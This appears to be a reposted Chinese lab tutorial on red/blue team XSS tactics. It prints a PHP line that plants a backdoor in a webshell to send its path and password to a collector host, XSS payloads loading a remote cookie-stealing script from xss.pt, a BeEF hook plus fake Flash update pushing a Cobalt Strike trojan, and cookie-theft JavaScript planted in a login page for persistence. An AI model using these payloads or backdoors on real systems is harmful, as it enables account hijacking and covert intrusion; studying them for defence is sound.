web安全XSS红队盲打&蓝队钓鱼反击&权限维持

Posted Nu1LL+

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了web安全XSS红队盲打&蓝队钓鱼反击&权限维持相关的知识,希望对你有一定的参考价值。

一、关于红蓝队环境安装

linux 一款红/蓝队环境自动化部署工具:https://github.com/ffffffff0x/f8x
参考:https://www.cnblogs.com/fdgmy/p/14456293.html

bash f8x -h  查看使用参数

在这里插入图片描述
在这里插入图片描述

二、红队盲打目标webshell箱子反击

webshell箱子:用来收集别人入侵控制的webshell的信息(后门地址及密码)
作者:为了保证得到更多别人的成功东西,那么他会在论坛 QQ群等地方发布类似的后门文件 并且配上特有宣传词汇诱惑你下载使用,简单的说一般这些后门文件的代码都是加密过的,这就存在一些猫腻了,因为在这些加密过的代码中有着后门代码,这些后门会将你找到的shell发送到他的服务器,就相当于你给别人打工。

各种webshell:https://github.com/tennc/webshell

webshell箱子搭建好如下
在这里插入图片描述

然后在本地搭建一个php服务,放一个php大马
在这里插入图片描述
并且在大马里面添加一个不为人知的代码

$admin[pass]  = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel
$url=$_SERVER['SCRIPT_FILENAME'];
echo $url;
echo "<script src='http://192.168.111.128:80/api.asp?url=$url&pass=$admin[pass]'></script>";

完事之后访问就能看到webshell箱子上线
在这里插入图片描述

反制webshell箱子
那我们可以数据包之间的请求来判断是否有后门
在这里插入图片描述

http://192.168.111.128/api.asp?url=D:/phpstudy_pro/WWW/as.php&pass=ec38fe2a8497e0a8d6d349b3533038cb

这里相当于是一个发送自己shell信息的地址,这里有变量的传递并且还可能存在展示的信息,展示的内容受到我们的控制,那么将展示信息修改成盗取cookie的js代码实现反杀

http://192.168.111.128/api.asp?
url=<sCRiPt sRC=//xss.pt/82MJ></sCrIpT>&id=1&
pass=<sCRiPt sRC=//xss.pt/82MJ></sCrIpT>

这里模仿管理员正常浏览,于是就中招
在这里插入图片描述

可以看到我们用xss平台的恶意语句成功利用,已经上线
在这里插入图片描述

获取到cookie,我们就可以利用cookie进行登陆
在这里插入图片描述
抓包修改cookie,成功进入后台
在这里插入图片描述
在这里插入图片描述

三、蓝队搞笑钓鱼反杀

Flash钓鱼弹窗版:https://github.com/r00tSe7en/Flash-Pop
Beef-XSS安装平台:https://github.com/beefproject/beef/tags

1.伪造好Flash钓鱼网址
在这里插入图片描述
2.然后在主页访问就自动加载一下beef的xss
在这里插入图片描述
在这里插入图片描述
3.现在就开始模仿一个误入歧途的红队人员,现在开始进入一个资源池的网址进行信息收集
在这里插入图片描述
这时候beef的xss恶意代码就已经自动加载上线
在这里插入图片描述
然后让他强行跳转到钓鱼页面
在这里插入图片描述
此时如果被攻击者点击立即升级,下载我们的CS木马并运行
在这里插入图片描述
在这里插入图片描述
CS上线之后,蓝队人员就可以写报告咯

四、红队利用Xss+Cookie权限维持

在红蓝对抗里面 ,红队经常要控制权限,其中web权限大部分都采用的shell控制, 但是shell会出现被删除,被拦截,被查杀等情况,漏洞也有可能被找到修复到,下一次控制的机会就基本没有了,那么权限维持将盗取cookie的js代码植入到后台登录成功的文件中去,实现每个登录成功的操作都会将其cookie发送到平台,这样实现了长期的控制,并且这个代码不会被查杀,拦截等情况

条件:得到webshell权限之后的事情
在这里插入图片描述
把xss平台上的代码放在登陆成功后的页面,这样就能实现权限维持
在这里插入图片描述

在这里插入图片描述
登陆成功后,xss代码成功利用,缺陷就是加载的过程会有点慢

在这里插入图片描述

以上是关于web安全XSS红队盲打&蓝队钓鱼反击&权限维持的主要内容,如果未能解决你的问题,请参考以下文章

安恒Red Team 内部红蓝对抗框架

Web安全XSS

Pikachu漏洞练习平台实验——XSS

Pikachu靶场-xss详解

如何让网络安全的防守技术更强?20年白帽子老江湖告诉你蓝队

网络安全实操XSS订单系统漏洞(利用盲打)